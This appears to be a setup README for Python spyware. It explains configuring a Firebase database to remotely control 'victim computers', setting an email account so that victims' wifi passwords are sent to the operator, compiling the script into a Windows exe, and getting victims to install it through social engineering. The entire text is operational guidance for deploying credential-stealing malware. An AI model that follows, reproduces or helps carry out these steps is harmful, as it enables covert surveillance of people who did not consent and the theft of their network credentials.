pip install Pyrebase
line no 13
db_credi ={
"apiKey": "",
"authDomain": "",
"projectId": "",
"storageBucket": "",
"messagingSenderId": "",
"appId": "",
"measurementId": "",
We use firebase to handle your victim computers.. (The database backup json file is in the folder) Basically we have a run child and a device child ..
runner child has a looping key and a running key
looping key = If the looping key is true, the spyware will run until you set the looping key to false
runner = If driver is false, your spyware is not working and is in a dead (down) state
If you want to run your spyware once, you need to set loop key to false and run key to true
device child helps manage your victims ...It is updated and edited by spyware
last date key = This will help you to know the last date your wifi key was updated
line no 64 & 65
This email setup is used to send the victim's wifi password to your email... If your victim internet connection is not live it will wait for it to reconnect and send you an update as soon as possible.
emaill = "your email"
passW = "app password"
- install auto-py-to-exe
pip install auto-py-to-exe
- run auto-py-to-exe open cmd and type this
and select py file and click convert button
You need to install this exe file to windows pc ... You can also use social engineering method